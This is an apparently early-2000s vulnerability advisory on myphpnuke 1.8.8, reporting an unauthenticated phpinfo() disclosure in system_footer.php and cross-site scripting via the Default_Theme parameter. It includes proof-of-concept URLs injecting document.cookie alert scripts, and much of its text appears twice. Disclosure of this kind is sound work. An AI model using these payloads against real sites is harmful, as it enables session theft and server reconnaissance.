Mindwarper
07/01/03, 01:33
myphpnuke version 1.8.8_final_7 and prior that contain sysinfo are
vulnerable to both css attack and phpinfo() Disclosure. The problem is that
unlike the rest of the scripts under /admin/, sysinfo's footer script
called system_footer.php does not check who the user is.
Inside system_footer.php the following code is run:
echo "<br>";
phpinfo();
echo "<br>";
Thus showing any remote user sensitive data about the server.
-
Another problem in myphpnuke is the unchecked template includes.
Examples:
http://victim/html/partner.php?mainfile=anything&Default_Theme='<script>aler
t(document.cookie);</script>
http://victim/html/chatheader.php?mainfile=anything&Default_Theme='<script>a
lert(document.cookie);</script>
....and a couple more of these exist.
- Mindwarper
-- logger@hehe.com
_____________________________________________
Free email with personality! Over 200 domains!
http://www.MyOwnEmail.com
Looking for friendships,romance and more?
http://www.MyOwnFriends.com
vulnerable to both css attack and phpinfo() Disclosure. The problem is that
unlike the rest of the scripts under /admin/, sysinfo's footer script
called system_footer.php does not check who the user is.
Inside system_footer.php the following code is run:
echo "<br>";
phpinfo();
echo "<br>";
Thus showing any remote user sensitive data about the server.
-
Another problem in myphpnuke is the unchecked template includes.
Examples:
http://victim/html/partner.php?mainfile=anything&Default_Theme='<script>aler
t(document.cookie);</script>
http://victim/html/chatheader.php?mainfile=anything&Default_Theme='<script>a
lert(document.cookie);</script>
....and a couple more of these exist.
- Mindwarper
-- logger@hehe.com
_____________________________________________
Free email with personality! Over 200 domains!
http://www.MyOwnEmail.com
Looking for friendships,romance and more?
http://www.MyOwnFriends.com